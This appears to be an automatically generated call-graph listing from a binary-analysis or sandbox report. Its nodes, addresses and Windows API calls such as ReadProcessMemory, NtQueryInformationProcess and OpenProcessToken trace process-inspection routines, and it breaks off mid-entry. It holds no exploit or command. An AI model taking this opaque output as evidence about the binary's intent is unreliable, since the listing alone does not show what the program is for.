35825->35824 35826->35675 35827->35673 35828->35794 35829->35811 35830->35825 35842 7ffdfb20a910 72 API calls 35831->35842 35833 7ffdfb2deae8 35834 7ffdfb2dec53 35833->35834 35835 7ffdfb2dec2c memcpy 35833->35835 35838 7ffdfb20a8d0 HeapAlloc 35833->35838 35837 7ffdfb2deab0 71 API calls 35834->35837 35835->35695 35839 7ffdfb2dec60 35837->35839 35840 7ffdfb2dec27 35838->35840 35839->35695 35840->35834 35840->35835 35841->35697 35842->35833 35843->35709 35844->35711 35845 7ffdfb211450 35846 7ffdfb21148c 35845->35846 35847 7ffdfb21146c 35845->35847 35863 7ffdfb211360 35846->35863 35850 7ffdfb302850 6 API calls 35852 7ffdfb2114da 35850->35852 35851 7ffdfb2114e9 35852->35851 35867 7ffdfb210e20 35852->35867 35855 7ffdfb302850 6 API calls 35856 7ffdfb2115cd 35855->35856 35871 7ffdfb25cf30 35856->35871 35858 7ffdfb21161f 35896 7ffdfb228be0 35858->35896 35861 7ffdfb21168c 35862 7ffdfb20a8e0 HeapFree 35862->35861 35864 7ffdfb2113b5 35863->35864 35866 7ffdfb211381 35863->35866 35864->35850 35865 7ffdfb20a8e0 HeapFree 35865->35866 35866->35864 35866->35865 35868 7ffdfb210ec0 35867->35868 35869 7ffdfb210e41 35867->35869 35868->35855 35869->35868 35870 7ffdfb20a8e0 HeapFree 35869->35870 35870->35869 35910 7ffdfb25abd0 35871->35910 35873 7ffdfb25cf3b 35874 7ffdfb25cf40 35873->35874 35877 7ffdfb25cf64 35873->35877 35875 7ffdfb25cf48 35874->35875 35950 7ffdfb258a20 35874->35950 35875->35858 35891 7ffdfb25cfa3 35877->35891 35969 7ffdfb28e560 35877->35969 35880 7ffdfb25d084 35881 7ffdfb25d029 35880->35881 35883 7ffdfb20a8e0 HeapFree 35880->35883 35882 7ffdfb28e560 77 API calls 35881->35882 35887 7ffdfb25d02e 35881->35887 35885 7ffdfb25d0b9 35882->35885 35883->35881 35884 7ffdfb25cfe0 35884->35881 35888 7ffdfb20a8e0 HeapFree 35884->35888 35886 7ffdfb25d117 35885->35886 35890 7ffdfb25d0c3 35885->35890 35886->35887 35889 7ffdfb20a8e0 HeapFree 35886->35889 35887->35891 35893 7ffdfb25d189 35887->35893 35894 7ffdfb20a8e0 HeapFree 35887->35894 35888->35881 35889->35887 35890->35887 35892 7ffdfb20a8e0 HeapFree 35890->35892 35891->35858 35892->35887 35895 7ffdfb20a8e0 HeapFree 35893->35895 35894->35893 35895->35891 35897 7ffdfb228c74 35896->35897 35898 7ffdfb228c28 35896->35898 35900 7ffdfb228c7d 35897->35900 35901 7ffdfb228d7e 35897->35901 36078 7ffdfb20bc70 35898->36078 35903 7ffdfb25cf30 99 API calls 35900->35903 35901->35898 35904 7ffdfb228c88 35901->35904 35903->35904 35908 7ffdfb228d1c 35904->35908 36085 7ffdfb230a90 35904->36085 35906 7ffdfb211658 35906->35861 35906->35862 35908->35906 36102 7ffdfb227b90 HeapFree 35908->36102 35911 7ffdfb25cac0 35910->35911 35912 7ffdfb25cad5 TlsGetValue 35911->35912 35913 7ffdfb25cae4 35911->35913 35912->35913 35919 7ffdfb25cb00 35912->35919 35914 7ffdfb20a8d0 HeapAlloc 35913->35914 35913->35919 35915 7ffdfb25cb1f 35914->35915 35916 7ffdfb25cb81 35915->35916 35917 7ffdfb25cb24 TlsGetValue TlsSetValue 35915->35917 35920 7ffdfb2dead0 72 API calls 35916->35920 35918 7ffdfb25cb49 35917->35918 35917->35919 35921 7ffdfb20a8e0 HeapFree 35918->35921 35919->35873 35922 7ffdfb25cb90 35920->35922 35921->35919 35923 7ffdfb25cc83 35922->35923 35924 7ffdfb25cbb5 TlsGetValue 35922->35924 35927 7ffdfb25cc88 TlsGetValue 35923->35927 35925 7ffdfb25cc74 35924->35925 35926 7ffdfb25cbc8 35924->35926 35925->35873 35926->35925 35928 7ffdfb25cbf0 35926->35928 35972 7ffdfb263090 35926->35972 35927->35925 35927->35926 35931 7ffdfb20a8d0 HeapAlloc 35928->35931 35930 7ffdfb25cbe8 35977 7ffdfb262e00 35930->35977 35933 7ffdfb25cc0c 35931->35933 35934 7ffdfb25cc9d 35933->35934 35935 7ffdfb25cc15 TlsGetValue TlsSetValue 35933->35935 35936 7ffdfb2dead0 72 API calls 35934->35936 35935->35925 35937 7ffdfb25cc3a 35935->35937 35938 7ffdfb25ccac 35936->35938 35939 7ffdfb25cc61 35937->35939 35991 7ffdfb264290 85 API calls 35937->35991 35941 7ffdfb20a8e0 HeapFree 35938->35941 35940 7ffdfb20a8e0 HeapFree 35939->35940 35940->35925 35943 7ffdfb25ccc4 35941->35943 35944 7ffdfb302850 6 API calls 35943->35944 35945 7ffdfb25cccc 35944->35945 35946 7ffdfb25ccf6 35945->35946 35992 7ffdfb264290 85 API calls 35945->35992 35948 7ffdfb302850 6 API calls 35946->35948 35949 7ffdfb25ccfe 35948->35949 35951 7ffdfb258a39 35950->35951 35953 7ffdfb258a73 35950->35953 35995 7ffdfb2b98d0 35951->35995 35954 7ffdfb258aa1 35953->35954 35955 7ffdfb258aae 35953->35955 35956 7ffdfb258a8d 35953->35956 35954->35875 36001 7ffdfb2578c0 HeapFree 35955->36001 36000 7ffdfb2578c0 HeapFree 35956->36000 35959 7ffdfb258af0 35960 7ffdfb302850 6 API calls 35959->35960 35961 7ffdfb258b13 35960->35961 35962 7ffdfb258b96 35961->35962 35963 7ffdfb258b87 35961->35963 35965 7ffdfb2b98d0 2 API calls 35962->35965 36002 7ffdfb257730 HeapFree 35963->36002 35967 7ffdfb258c2d 35965->35967 35966 7ffdfb258b91 35966->35875 35967->35966 36003 7ffdfb257730 HeapFree 35967->36003 36004 7ffdfb28e6a0 35969->36004 35971 7ffdfb25cfd2 35971->35880 35971->35884 35973 7ffdfb26309f 35972->35973 35974 7ffdfb2630ab 35972->35974 35973->35930 35993 7ffdfb264650 WaitOnAddress GetLastError 35974->35993 35976 7ffdfb2630b7 35976->35930 35978 7ffdfb263dc0 35977->35978 35979 7ffdfb263f0b 35978->35979 35981 7ffdfb263e3a memcpy 35978->35981 35994 7ffdfb263220 7 API calls 35979->35994 35984 7ffdfb20a8d0 HeapAlloc 35981->35984 35982 7ffdfb263f1d 35983 7ffdfb302850 6 API calls 35982->35983 35985 7ffdfb263f25 35983->35985 35986 7ffdfb263eb1 35984->35986 35987 7ffdfb263efc 35986->35987 35988 7ffdfb263eb6 memcpy 35986->35988 35990 7ffdfb2dead0 72 API calls 35987->35990 35989 7ffdfb263ee0 35988->35989 35989->35928 35989->35989 35990->35979 35991->35939 35992->35946 35993->35976 35994->35982 35996 7ffdfb2b995e 35995->35996 35997 7ffdfb2b98f2 35995->35997 35996->35953 35997->35996 35998 7ffdfb2b9936 WaitOnAddress 35997->35998 35998->35997 35999 7ffdfb2b9955 GetLastError 35998->35999 35999->35997 36000->35954 36001->35959 36002->35966 36003->35966 36041 7ffdfb2b64b0 36004->36041 36007 7ffdfb28e72c 36007->35971 36008 7ffdfb28e827 SetLastError GetEnvironmentVariableW 36012 7ffdfb28e847 GetLastError 36008->36012 36013 7ffdfb28e734 36008->36013 36009 7ffdfb28e719 36015 7ffdfb20a8e0 HeapFree 36009->36015 36010 7ffdfb28e6dd 36010->36007 36010->36009 36014 7ffdfb20a8e0 HeapFree 36010->36014 36012->36013 36016 7ffdfb28e914 GetLastError 36012->36016 36013->36008 36017 7ffdfb28e860 GetLastError 36013->36017 36019 7ffdfb28e892 36013->36019 36054 7ffdfb27c430 72 API calls 36013->36054 36014->36009 36015->36007 36018 7ffdfb28e92c 36016->36018 36024 7ffdfb28e8f8 36016->36024 36017->36013 36026 7ffdfb28e9dd 36017->36026 36020 7ffdfb20a8e0 HeapFree 36018->36020 36021 7ffdfb28e89b 36019->36021 36019->36026 36020->36024 36055 7ffdfb29b9f0 36021->36055 36022 7ffdfb28e8fd 36022->36007 36028 7ffdfb20a8e0 HeapFree 36022->36028 36024->36022 36027 7ffdfb28e992 36024->36027 36030 7ffdfb20a8e0 HeapFree 36024->36030 36025 7ffdfb28e8aa 36025->36024 36032 7ffdfb20a8e0 HeapFree 36025->36032 36029 7ffdfb20a8e0 HeapFree 36026->36029 36034 7ffdfb28ea26 36026->36034 36031 7ffdfb20a8e0 HeapFree 36027->36031 36028->36007 36029->36034 36030->36027 36031->36022 36032->36024 36033 7ffdfb20a8e0 HeapFree 36033->36034 36034->36033 36035 7ffdfb28eaab 36034->36035 36037 7ffdfb302850 6 API calls 36034->36037 36036 7ffdfb20a8e0 HeapFree 36035->36036 36038 7ffdfb28eac7 36036->36038 36037->36034 36039 7ffdfb302850 6 API calls 36038->36039 36040 7ffdfb28eacf 36039->36040 36040->35971 36042 7ffdfb2b64d5 36041->36042 36043 7ffdfb2b650f 36041->36043 36042->36043 36045 7ffdfb2b651f 36042->36045 36046 7ffdfb20a8d0 HeapAlloc 36042->36046 36044 7ffdfb2deab0 72 API calls 36043->36044 36043->36045 36044->36045 36071 7ffdfb2852c0 36045->36071 36046->36043 36049 7ffdfb2b65fc 36051 7ffdfb28e6d1 36049->36051 36075 7ffdfb27c120 72 API calls 36049->36075 36050 7ffdfb2b65d1 36050->36051 36053 7ffdfb20a8e0 HeapFree 36050->36053 36051->36010 36051->36013 36053->36051 36054->36013 36056 7ffdfb29ba3b 36055->36056 36057 7ffdfb29ba11 36055->36057 36058 7ffdfb2deab0 72 API calls 36056->36058 36059 7ffdfb20a8d0 HeapAlloc 36057->36059 36070 7ffdfb29ba40 36057->36070 36061 7ffdfb29bbf7 36058->36061 36060 7ffdfb29ba36 36059->36060 36060->36056 36060->36070 36062 7ffdfb29bc16 36061->36062 36064 7ffdfb20a8e0 HeapFree 36061->36064 36065 7ffdfb302850 6 API calls 36062->36065 36063 7ffdfb29bbc6 36063->36025 36064->36062 36067 7ffdfb29bc1e 36065->36067 36066 7ffdfb2a4840 72 API calls 36066->36070 36077 7ffdfb2abe80 72 API calls 36067->36077 36069 7ffdfb29bc3d 36069->36025 36070->36063 36070->36066 36074 7ffdfb2852f0 36071->36074 36072 7ffdfb285435 36072->36049 36072->36050 36074->36072 36076 7ffdfb27c430 72 API calls 36074->36076 36075->36051 36076->36072 36077->36069 36079 7ffdfb20bd53 36078->36079 36082 7ffdfb20bc92 36078->36082 36101 7ffdfb20af60 72 API calls 36079->36101 36081 7ffdfb20bcf4 memcpy 36081->36082 36083 7ffdfb20bd27 memcpy 36081->36083 36082->36079 36082->36081 36103 7ffdfb20ddf0 memcpy 36082->36103 36117 7ffdfb228200 36082->36117 36083->36082 36086 7ffdfb230ab0 36085->36086 36087 7ffdfb230ac1 36086->36087 36088 7ffdfb258a20 9 API calls 36086->36088 36092 7ffdfb230c50 36086->36092 36400 7ffdfb22f6c0 36087->36400 36090 7ffdfb230b03 36088->36090 36090->36092 36093 7ffdfb230b2a 36090->36093 36091 7ffdfb230b8e 36091->35908 36094 7ffdfb302850 6 API calls 36092->36094 36096 7ffdfb230ba5 36093->36096 36097 7ffdfb230b36 36093->36097 36095 7ffdfb230ccc 36094->36095 36433 7ffdfb230460 162 API calls 36096->36433 36097->36087 36099 7ffdfb230bf9 36097->36099 36434 7ffdfb230920 162 API calls 36099->36434 36101->35906 36102->35908 36104 7ffdfb20e078 36103->36104 36105 7ffdfb20dea8 36103->36105 36257 7ffdfb222910 36104->36257 36105->36104 36112 7ffdfb20e00c 36105->36112 36113 7ffdfb20df6c GetProcessTimes 36105->36113 36110 7ffdfb21dbc0 103 API calls 36111 7ffdfb20e0f2 memcpy 36110->36111 36114 7ffdfb20e05e 36111->36114 36128 7ffdfb21dbc0 36112->36128 36116 7ffdfb20df9d 36113->36116 36114->36082 36116->36104 36116->36112 36118 7ffdfb2282a9 36117->36118 36125 7ffdfb228213 36117->36125 36119 7ffdfb2deab0 72 API calls 36118->36119 36121 7ffdfb22828f 36119->36121 36120 7ffdfb2282bf 36122 7ffdfb2deab0 72 API calls 36120->36122 36123 7ffdfb2deab0 72 API calls 36121->36123 36127 7ffdfb228296 36121->36127 36124 7ffdfb2282c4 36122->36124 36123->36120 36125->36120 36125->36121 36126 7ffdfb2280c0 2 API calls 36125->36126 36126->36121 36127->36083 36129 7ffdfb21dbe5 36128->36129 36135 7ffdfb21dcb6 36128->36135 36130 7ffdfb21dc98 GetSystemTimes 36129->36130 36131 7ffdfb21dc39 GetProcessTimes 36129->36131 36130->36135 36131->36130 36133 7ffdfb21dc66 36131->36133 36132 7ffdfb21de56 GetProcessIoCounters 36134 7ffdfb21de6b 36132->36134 36133->36130 36137 7ffdfb21e0d1 36134->36137 36140 7ffdfb21df24 OpenProcessToken 36134->36140 36135->36132 36135->36134 36136 7ffdfb21e1ac NtQueryInformationProcess 36139 7ffdfb21e1e9 36136->36139 36160 7ffdfb21e188 36136->36160 36137->36136 36137->36160 36138 7ffdfb21e5c6 36138->36114 36141 7ffdfb21e204 NtQueryInformationProcess 36139->36141 36191 7ffdfb21e2fb 36139->36191 36140->36137 36142 7ffdfb21df49 36140->36142 36146 7ffdfb21e22d 36141->36146 36141->36160 36142->36137 36147 7ffdfb21df5f GetTokenInformation 36142->36147 36143 7ffdfb21e343 ReadProcessMemory 36148 7ffdfb21e36d ReadProcessMemory 36143->36148 36143->36160 36144 7ffdfb21e531 memset 36333 7ffdfb243c60 36144->36333 36145 7ffdfb21e5b6 36145->36138 36155 7ffdfb20a8e0 HeapFree 36145->36155 36146->36143 36152 7ffdfb21e25e ReadProcessMemory 36146->36152 36146->36160 36150 7ffdfb21df94 GetProcessHeap 36147->36150 36165 7ffdfb21e04c 36147->36165 36148->36160 36169 7ffdfb21e39b 36148->36169 36153 7ffdfb21dfa8 HeapAlloc 36150->36153 36164 7ffdfb21e014 36150->36164 36151 7ffdfb21e558 GetModuleFileNameExW 36156 7ffdfb21e580 36151->36156 36157 7ffdfb21e285 ReadProcessMemory 36152->36157 36152->36160 36158 7ffdfb21dfc1 GetTokenInformation 36153->36158 36159 7ffdfb21e0c5 CloseHandle 36153->36159 36154 7ffdfb21e441 36166 7ffdfb21e7b2 VirtualQueryEx 36154->36166 36186 7ffdfb21e8ac 36154->36186 36155->36138 36171 7ffdfb29b9f0 72 API calls 36156->36171 36157->36160 36161 7ffdfb21e2b4 memcpy 36157->36161 36162 7ffdfb21dfe6 36158->36162 36163 7ffdfb21e097 36158->36163 36159->36137 36160->36138 36160->36144 36160->36145 36289 7ffdfb21fb40 36161->36289 36376 7ffdfb215080 73 API calls 36162->36376 36181 7ffdfb21e0b0 36163->36181 36164->36159 36179 7ffdfb21e03d 36164->36179 36165->36150 36165->36164 36172 7ffdfb21e873 36166->36172 36173 7ffdfb21e7d8 36166->36173 36169->36154 36170 7ffdfb21e3f9 36169->36170 36382 7ffdfb215d10 WaitOnAddress GetLastError 36169->36382 36177 7ffdfb21e6e2 36170->36177 36178 7ffdfb21e40a 36170->36178 36171->36145 36389 7ffdfb2246b0 HeapFree 36172->36389 36334 7ffdfb21f640 36173->36334 36176 7ffdfb21dff6 36183 7ffdfb21e648 36176->36183 36184 7ffdfb21e007 36176->36184 36185 7ffdfb21f640 75 API calls 36177->36185 36379 7ffdfb2246b0 HeapFree 36178->36379 36179->36159 36378 7ffdfb21d210 GetProcessHeap HeapFree 36181->36378 36188 7ffdfb21e67e 36183->36188 36189 7ffdfb21e66c 36183->36189 36377 7ffdfb21d210 GetProcessHeap HeapFree 36184->36377 36194 7ffdfb21e6f2 36185->36194 36186->36160 36200 7ffdfb21f640 75 API calls 36186->36200 36187 7ffdfb21e7fb 36187->36172 36210 7ffdfb21e80f 36187->36210 36380 7ffdfb21d210 GetProcessHeap HeapFree 36188->36380 36195 7ffdfb20a8e0 HeapFree 36189->36195 36191->36143 36191->36160 36199 7ffdfb21e709 36194->36199 36383 7ffdfb21f480 36194->36383 36195->36188 36197 7ffdfb21e890 36197->36186 36206 7ffdfb20a8e0 HeapFree 36197->36206 36198 7ffdfb21e00f 36381 7ffdfb213b10 CloseHandle 36198->36381 36388 7ffdfb2246b0 HeapFree 36199->36388 36203 7ffdfb21ea86 36200->36203 36208 7ffdfb21ea9d 36203->36208 36218 7ffdfb21ead0 36203->36218 36204 7ffdfb21e425 36204->36154 36214 7ffdfb20a8e0 HeapFree 36204->36214 36206->36186 36207 7ffdfb21e73d 36207->36199 36216 7ffdfb20a8e0 HeapFree 36207->36216 36208->36160 36221 7ffdfb20a8e0 HeapFree 36208->36221 36215 7ffdfb20a8e0 HeapFree 36210->36215 36227 7ffdfb21e8c9 36210->36227 36211 7ffdfb21e6a8 36211->36137 36212 7ffdfb21e920 36212->36186 36220 7ffdfb20a8e0 HeapFree 36212->36220 36213 7ffdfb21e760 36213->36154 36217 7ffdfb20a8e0 HeapFree 36213->36217 36214->36154 36215->36210 36216->36199 36217->36154 36219 7ffdfb29b9f0 72 API calls 36218->36219 36222 7ffdfb21eb15 36219->36222 36220->36186 36221->36160 36390 7ffdfb21f360 74 API calls 36222->36390 36223 7ffdfb21e9c3 36224 7ffdfb21ec40 36223->36224 36226 7ffdfb20a8e0 HeapFree 36223->36226 36228 7ffdfb21eda3 36224->36228 36231 7ffdfb20a8e0 HeapFree 36224->36231 36226->36224 36227->36212 36227->36223 36230 7ffdfb29b9f0 72 API calls 36227->36230 36365 7ffdfb2285d0 36227->36365 36234 7ffdfb302850 6 API calls 36228->36234 36229 7ffdfb21eb4b 36232 7ffdfb21ebb0 36229->36232 36233 7ffdfb21eb50 36229->36233 36230->36227 36235 7ffdfb21ecfc 36231->36235 36236 7ffdfb21eb94 36232->36236 36239 7ffdfb20a8e0 HeapFree 36232->36239 36233->36236 36242 7ffdfb20a8e0 HeapFree 36233->36242 36237 7ffdfb21edab 36234->36237 36238 7ffdfb302850 6 API calls 36235->36238 36236->36160 36243 7ffdfb20a8e0 HeapFree 36236->36243 36245 7ffdfb21edd1 GetProcessTimes 36237->36245 36246 7ffdfb21ee09 36237->36246 36241 7ffdfb21ed04 36238->36241 36239->36236 36244 7ffdfb21ed23 36241->36244 36247 7ffdfb20a8e0 HeapFree 36241->36247 36242->36236 36243->36160 36248 7ffdfb302850 6 API calls 36244->36248 36250 7ffdfb21ee02 36245->36250 36246->36114 36247->36244 36249 7ffdfb21ed43 36248->36249 36249->36228 36251 7ffdfb21ed77 36249->36251 36250->36114 36252 7ffdfb20a8e0 HeapFree 36251->36252 36253 7ffdfb21ed8b 36252->36253 36254 7ffdfb302850 6 API calls 36253->36254 36255 7ffdfb21ed93 36254->36255 36391 7ffdfb213b10 CloseHandle 36255->36391 36258 7ffdfb22292d 36257->36258 36259 7ffdfb222942 36257->36259 36260 7ffdfb29b9f0 72 API calls 36258->36260 36261 7ffdfb222947 36259->36261 36262 7ffdfb22298a 36259->36262 36268 7ffdfb20e093 36260->36268 36264 7ffdfb2229be 36261->36264 36265 7ffdfb22294d 36261->36265 36263 7ffdfb20a8d0 HeapAlloc 36262->36263 36266 7ffdfb2229a8 36263->36266 36267 7ffdfb2e0010 78 API calls 36264->36267 36269 7ffdfb20a8d0 HeapAlloc 36265->36269 36266->36268 36271 7ffdfb2deab0 72 API calls 36266->36271 36267->36268 36274 7ffdfb21d840 36268->36274 36270 7ffdfb22296b 36269->36270 36270->36268 36272 7ffdfb2deab0 72 API calls 36270->36272 36273 7ffdfb222a5d 36271->36273 36272->36266 36275 7ffdfb20e0bd 36274->36275 36278 7ffdfb21d86d 36274->36278 36275->36110 36276 7ffdfb21d930 GetProcessTimes 36279 7ffdfb21d965 36276->36279 36277 7ffdfb21d8c6 OpenProcess 36282 7ffdfb21d8e1 36277->36282 36278->36276 36278->36277 36280 7ffdfb20a8d0 HeapAlloc 36279->36280 36281 7ffdfb21d9d3 36280->36281 36281->36275 36283 7ffdfb2dead0 72 API calls 36281->36283 36282->36275 36282->36276 36284 7ffdfb21db38 36283->36284 36285 7ffdfb21dbab 36284->36285 36286 7ffdfb20a8e0 HeapFree 36284->36286 36287 7ffdfb302850 6 API calls 36285->36287 36286->36285 36288 7ffdfb21dbb3 36287->36288 36290 7ffdfb21e2e4 36289->36290 36291 7ffdfb21fb52 36289->36291 36308 7ffdfb21fd30 36290->36308 36291->36290 36292 7ffdfb21fb78 36291->36292 36392 7ffdfb215d10 WaitOnAddress GetLastError 36291->36392 36294 7ffdfb21fc27 36292->36294 36305 7ffdfb21fb85 36292->36305 36295 7ffdfb21f640 75 API calls 36294->36295 36296 7ffdfb21fc3a 36295->36296 36298 7ffdfb21fc47 36296->36298 36299 7ffdfb21f480 73 API calls 36296->36299 36297 7ffdfb21fbd2 36297->36290 36302 7ffdfb20a8e0 HeapFree 36297->36302 36301 7ffdfb21fcd2 36298->36301 36307 7ffdfb20a8e0 HeapFree 36298->36307 36300 7ffdfb21fc76 36299->36300 36300->36298 36306 7ffdfb20a8e0 HeapFree 36300->36306 36301->36290 36304 7ffdfb20a8e0 HeapFree 36301->36304 36302->36290 36303 7ffdfb20a8e0 HeapFree 36303->36305 36304->36290 36305->36297 36305->36303 36306->36298 36307->36298 36309 7ffdfb21fdfd 36308->36309 36310 7ffdfb21fd49 36308->36310 36309->36191 36310->36309 36311 7ffdfb21fd63 VirtualQueryEx 36310->36311 36312 7ffdfb21fd81 36311->36312 36316 7ffdfb21fdab 36311->36316 36313 7ffdfb21f640 75 API calls 36312->36313 36315 7ffdfb21fd9e 36313->36315 36314 7ffdfb21fde2 36314->36309 36317 7ffdfb20a8e0 HeapFree 36314->36317 36315->36316 36320 7ffdfb21fe19 36315->36320 36316->36314 36318 7ffdfb20a8e0 HeapFree 36316->36318 36317->36309 36318->36316 36319 7ffdfb21fea8 36319->36309 36322 7ffdfb20a8e0 HeapFree 36319->36322 36321 7ffdfb20a8e0 HeapFree 36320->36321 36326 7ffdfb21fe62 36320->36326 36321->36320 36322->36309 36323 7ffdfb21ff44 36324 7ffdfb21ffd6 36323->36324 36327 7ffdfb20a8e0 HeapFree 36323->36327 36325 7ffdfb21fff8 36324->36325 36328 7ffdfb20a8e0 HeapFree 36324->36328 36329 7ffdfb302850 6 API calls 36325->36329 36326->36319 36326->36323 36330 7ffdfb29b9f0 72 API calls 36326->36330 36332 7ffdfb2285d0 73 API calls 36326->36332 36327->36324 36328->36325 36331 7ffdfb220000 36329->36331 36330->36326 36332->36326 36333->36151 36335 7ffdfb21f77f 36334->36335 36336 7ffdfb21f66f 36334->36336 36337 7ffdfb2deab0 72 API calls 36335->36337 36336->36335 36338 7ffdfb20a8d0 HeapAlloc 36336->36338 36339 7ffdfb21f78a 36337->36339 36340 7ffdfb21f6a8 36338->36340 36341 7ffdfb20a8e0 HeapFree 36339->36341 36340->36335 36342 7ffdfb21f6b1 ReadProcessMemory 36340->36342 36343 7ffdfb21f79e 36341->36343 36348 7ffdfb21f6dc 36342->36348 36344 7ffdfb302850 6 API calls 36343->36344 36347 7ffdfb21f7a6 36344->36347 36345 7ffdfb21f6e3 36345->36187 36346 7ffdfb20a8e0 HeapFree 36346->36345 36349 7ffdfb21f821 36347->36349 36350 7ffdfb21f640 74 API calls 36347->36350 36348->36345 36348->36346 36349->36187 36351 7ffdfb21f85b 36350->36351 36352 7ffdfb21f865 36351->36352 36354 7ffdfb21f889 36351->36354 36352->36349 36353 7ffdfb20a8e0 HeapFree 36352->36353 36353->36349 36355 7ffdfb29b9f0 72 API calls 36354->36355 36356 7ffdfb21f8c6 36355->36356 36393 7ffdfb21f360 74 API calls 36356->36393 36358 7ffdfb21f8f4 36359 7ffdfb21f93e 36358->36359 36360 7ffdfb21f8f9 36358->36360 36361 7ffdfb21f929 36359->36361 36362 7ffdfb20a8e0 HeapFree 36359->36362 36360->36361 36363 7ffdfb20a8e0 HeapFree 36360->36363 36361->36349 36364 7ffdfb20a8e0 HeapFree 36361->36364 36362->36361 36363->36361 36364->36349 36366 7ffdfb228673 36365->36366 36371 7ffdfb2285e3 36365->36371 36367 7ffdfb2deab0 72 API calls 36366->36367 36369 7ffdfb228659 36367->36369 36368 7ffdfb228689 36370 7ffdfb2deab0 72 API calls 36368->36370 36372 7ffdfb2deab0 72 API calls 36369->36372 36375 7ffdfb228660 36369->36375 36373 7ffdfb22868e 36370->36373 36371->36368 36371->36369 36394 7ffdfb2280c0 36371->36394 36372->36368 36375->36227 36376->36176 36377->36198 36378->36159 36379->36204 36380->36198 36381->36211 36382->36170 36385 7ffdfb21f4a2 36383->36385 36384 7ffdfb21f54d 36384->36207 36385->36384 36386 7ffdfb29b9f0 72 API calls 36385->36386 36387 7ffdfb2285d0 73 API calls 36385->36387 36386->36385 36387->36385 36388->36213 36389->36197 36390->36229 36391->36228 36392->36292 36393->36358 36395 7ffdfb2280f0 36394->36395 36397 7ffdfb2280d7 36394->36397 36396 7ffdfb22810a 36395->36396 36398 7ffdfb20a8d0 HeapAlloc 36395->36398 36396->36369 36397->36395 36399 7ffdfb2280ee RtlReAllocateHeap 36397->36399 36398->36396 36399->36395 36401 7ffdfb22f77d 36400->36401 36403 7ffdfb22f78b 36400->36403 36482 7ffdfb217ea0 93 API calls 36401->36482 36404 7ffdfb22f818 36403->36404 36483 7ffdfb260d70 36403->36483 36405 7ffdfb228be0 162 API calls 36404->36405 36412 7ffdfb22f87a 36405->36412 36407 7ffdfb22f96e 36407->36091 36409 7ffdfb22f9a4 36464 7ffdfb231c90 36409->36464 36412->36409 36413 7ffdfb22f93b 36412->36413 36414 7ffdfb22f91a 36412->36414 36435 7ffdfb217ce0 36412->36435 36439 7ffdfb218140 36412->36439 36413->36407 36487 7ffdfb231960 HeapFree 36413->36487 36414->36413 36451 7ffdfb25a730 36414->36451 36416 7ffdfb22fade 36418 7ffdfb302850 6 API calls 36416->36418 36419 7ffdfb22fafb 36418->36419 36421 7ffdfb22fbdb 36419->36421 36488 7ffdfb217ea0 93 API calls 36419->36488 36422 7ffdfb260d70 8 API calls 36421->36422 36430 7ffdfb22fc68 36421->36430 36422->36430 36423 7ffdfb22fd8b 36489 7ffdfb2325d0 7 API calls 36423->36489 36424 7ffdfb217ce0 93 API calls 36424->36430 36426 7ffdfb22fe24 36426->36091 36427 7ffdfb22fe67 36490 7ffdfb231f70 7 API calls 36427->36490 36428 7ffdfb218140 90 API calls 36428->36430 36430->36423 36430->36424 36430->36427 36430->36428 36431 7ffdfb22fd6a 36430->36431 36431->36423 36432 7ffdfb25a730 162 API calls 36431->36432 36432->36423 36433->36091 36434->36091 36436 7ffdfb217d4e 36435->36436 36437 7ffdfb217d03 36435->36437 36436->36412 36437->36436 36491 7ffdfb217ea0 93 API calls 36437->36491 36440 7ffdfb218159 36439->36440 36441 7ffdfb263090 2 API calls 36440->36441 36447 7ffdfb21815e 36440->36447 36442 7ffdfb21816f 36441->36442 36444 7ffdfb262e00 74 API calls 36442->36444 36445 7ffdfb218177 36444->36445 36445->36447 36508 7ffdfb264290 85 API calls 36445->36508 36492 7ffdfb218280 36447->36492 36448 7ffdfb21821b 36448->36412 36449 7ffdfb2181aa 36449->36448 36509 7ffdfb264290 85 API calls 36449->36509 36452 7ffdfb25a74d 36451->36452 36453 7ffdfb25a8b7 36451->36453 36452->36453 36456 7ffdfb25a7e8 36452->36456 36459 7ffdfb260d70 8 API calls 36452->36459 36460 7ffdfb28c220 SwitchToThread 36452->36460 36513 7ffdfb25ac30 36452->36513 36517 7ffdfb25b310 36452->36517 36530 7ffdfb25a950 36452->36530 36539 7ffdfb234cbb 36452->36539 36583 7ffdfb23597e 36452->36583 36594 7ffdfb260a80 11 API calls 36452->36594 36453->36413 36458 7ffdfb260d70 8 API calls 36456->36458 36458->36453 36459->36452 36460->36452 36465 7ffdfb231cab 36464->36465 36468 7ffdfb231d66 36464->36468 36466 7ffdfb228be0 162 API calls 36465->36466 36467 7ffdfb231ce2 36466->36467 36469 7ffdfb231d57 36467->36469 36472 7ffdfb231d2d 36467->36472 36476 7ffdfb231cef 36467->36476 36471 7ffdfb20a8e0 HeapFree 36468->36471 36481 7ffdfb231d9f 36468->36481 36469->36407 36470 7ffdfb302850 6 API calls 36474 7ffdfb231db9 36470->36474 36473 7ffdfb231d8c 36471->36473 36472->36469 36477 7ffdfb20a8e0 HeapFree 36472->36477 36475 7ffdfb302850 6 API calls 36473->36475 36478 7ffdfb231d94 36475->36478 36476->36469 36713 7ffdfb227b90 HeapFree 36476->36713 36477->36469 36714 7ffdfb233c00 HeapFree 36478->36714 36481->36470 36482->36403 36484 7ffdfb260d7d 36483->36484 36485 7ffdfb260dab 36483->36485 36484->36485 36715 7ffdfb260dc0 8 API calls 36484->36715 36485->36404 36487->36416 36488->36421 36489->36426 36490->36426 36491->36436 36493 7ffdfb21828b 36492->36493 36494 7ffdfb263090 2 API calls 36493->36494 36500 7ffdfb218290 36493->36500 36495 7ffdfb21830a 36494->36495 36497 7ffdfb262e00 74 API calls 36495->36497 36496 7ffdfb2182a9 36496->36449 36498 7ffdfb218312 36497->36498 36498->36500 36501 7ffdfb21832b 36498->36501 36500->36496 36511 7ffdfb2184b0 88 API calls 36500->36511 36501->36496 36510 7ffdfb264290 85 API calls 36501->36510 36502 7ffdfb2183e1 36503 7ffdfb218408 36502->36503 36512 7ffdfb264290 85 API calls 36502->36512 36505 7ffdfb302850 6 API calls 36503->36505 36507 7ffdfb218429 36505->36507 36508->36447 36509->36448 36510->36496 36511->36502 36512->36503 36514 7ffdfb25ac9e 36513->36514 36515 7ffdfb25ac53 36513->36515 36514->36452 36515->36514 36595 7ffdfb25adf0 97 API calls 36515->36595 36596 7ffdfb25ba70 36517->36596 36520 7ffdfb263090 2 API calls 36521 7ffdfb25b33f 36520->36521 36523 7ffdfb262e00 74 API calls 36521->36523 36524 7ffdfb25b347 36523->36524 36527 7ffdfb25b32e 36524->36527 36642 7ffdfb264290 85 API calls 36524->36642 36526 